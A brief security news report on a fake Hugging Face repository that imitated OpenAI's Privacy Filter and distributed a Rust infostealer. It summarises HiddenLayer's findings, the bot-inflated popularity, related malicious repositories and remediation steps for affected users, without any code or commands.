A fake AI model repository mimicking OpenAI's Privacy Filter rocketed to the top of Hugging Face's trending charts. It wasn't a model-it was a sophisticated infostealer.
The repository, published by an account named "Open-OSS," copied OpenAI's model card exactly. The only difference: instructions to download and run a malicious script.
Within 18 hours of publication, it logged 244,000 downloads and 667 likes. AI security firm HiddenLayer found that 657 of those likes came from bot accounts. The download numbers were likely inflated too-manufactured social proof to make the bait look real.
The malware was a six-stage infostealer written in Rust. It targeted Windows systems, disabling security checks, pulling commands from a hidden server, and deploying a custom payload. The final code stole everything: browser passwords, Discord tokens, cryptocurrency wallet seed phrases, SSH keys, FTP credentials, and full screenshots. It then packed the data in a compressed JSON bundle and sent it to attacker-controlled servers.
The attackers used fake training progress bars in the loader script to look legitimate. The malware checked for virtual machines or security sandboxes and shut down if detected. The full chain ran, collected data, and deleted itself, leaving almost no trace.
This is not an isolated incident. HiddenLayer found six more malicious repositories under the account "anthfu" from late April, using the same loader and targeting models like Qwen3, DeepSeek, and Bonsai.
If you downloaded the fake filter on a Windows machine, treat the device as fully compromised. Wipe it. Change all browser credentials, even session cookies. Move any crypto funds to a new wallet on a clean system. Invalidate your Discord sessions. All SSH keys and FTP credentials should be considered burned.
Hugging Face has removed the repository but hasn't disclosed any new screening measures for trending models.
Seven confirmed malicious repos have been found so far. How many others exist remains unknown.